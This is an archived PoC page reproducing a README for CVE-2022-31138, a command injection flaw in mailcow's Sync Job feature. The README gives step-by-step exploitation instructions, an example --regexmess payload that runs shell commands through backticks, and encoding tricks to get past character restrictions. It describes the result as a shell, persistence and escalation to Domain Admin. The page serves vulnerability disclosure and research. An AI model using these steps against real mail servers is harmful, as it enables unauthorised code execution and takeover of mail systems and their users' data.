Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-31138 PoC — OS Command Injection in mailcow

Source
https://github.com/ly1g3/Mailcow-CVE-2022-31138
Associated Vulnerability
Title:OS Command Injection in mailcow (CVE-2022-31138)
Description:mailcow is a mailserver suite. Prior to mailcow-dockerized version 2022-06a, an extended privilege vulnerability can be exploited by manipulating the custom parameters regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, or maxlinelengthcmd to execute arbitrary code. Users should update their mailcow instances with the `update.sh` script in the mailcow root directory to 2022-06a or newer to receive a patch for this issue. As a temporary workaround, the Syncjob ACL can be removed from all mailbox users, preventing changes to those settings.
Description
Mailcow CVE-2022-31138
Readme
# Mailcow CVE-2022-31138 
RCE and Domain Admin privilege escalation for Mailcow. POC for [CVE-2022-31245](https://github.com/ly1g3/Mailcow-CVE-2022-31245#proof-of-concept-poc) can be modified to work with this vulnerability. </br>

Reported and fixed: 2022-06

## Code Injection, RCE
Type: Code Injection (CWE-94), RCE, Domain Takeover </br>
Affected versions: least 2019 - 2022-06a </br>

A flaw exists in all recent Mailcow versions where a regular user of the system can exploit the “Sync Job” feature to gain a shell using perl code injection in arbitrary regex field in imapsync. Using this exploit a attacker can then easily pivot to the database and escalate privileges to the role of “Domain Admin” in Mailcow.

This exploit includes persistence by default since Sync Jobs run on a timer.

This exploit compromises the entire Mailcow instance. Tested and working on latest release as of 2022-06a.


### Technical overview
Almost all regex expressions in imapsync is evaluated using the `eval` function, this is highly unsafe when parameters are given by user-input. As a example, here is how `--regexmess` is parsed in imapsync (line 14213):
```perl
sub regexmess
{
        my ( $string ) = @_ ;
        foreach my $regexmess ( @regexmess ) {
                $sync->{ debug } and myprint( "eval \$string =~ $regexmess\n" ) ;
                my $ret = eval "\$string =~ $regexmess ; 1" ;
```
In Mailcow `$regexmess` is given as user-input.

The following imapsync flags (could be more) can be used to achieve code execution:
```
--regexmess
--skipmess
--regexflag
--delete2foldersonly
--delete2foldersbutnot
--regextrans2
```

Using the steps below the vulnerability can be recreated.

Gaining shell:
1. Go to the Mailcow login page (not SOGo)
2. Login as a regular user
3. Go to Sync Jobs
4. Set the following values: ```hostname=MAILCOW_IP, Port=IMAP_PORT, Username=CURRENT_USER, Password=CURRENT_PASS, Encryption=PLAIN, Interval=1, Active=Check, Custom Parameters=--debug --nosslcheck --regexmess=PERL_CODE```
Where the field "Custom Parameters" is the important field. PERL_CODE can be arbitrary perl code.
5. Press save and wait 1 min for the command to execute.

Custom Parameters example payload:
```
--debug --nosslcheck --regexmess=`touch\x{0020}test.txt`
```
PERL_CODE cannot contain space,quotes or slashes,  use `\x{0020}` instead of space. Use ``` ` ``` to run shell commands.


Privilege Escalation:

Follow the same steps as in [CVE-2022-31245](https://github.com/ly1g3/Mailcow-CVE-2022-31245#technical-overview).
File Snapshot

 [4.0K]  /data/pocs/4c00ba3b6db144045694aea6c794f78d9b785b70
└── [2.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →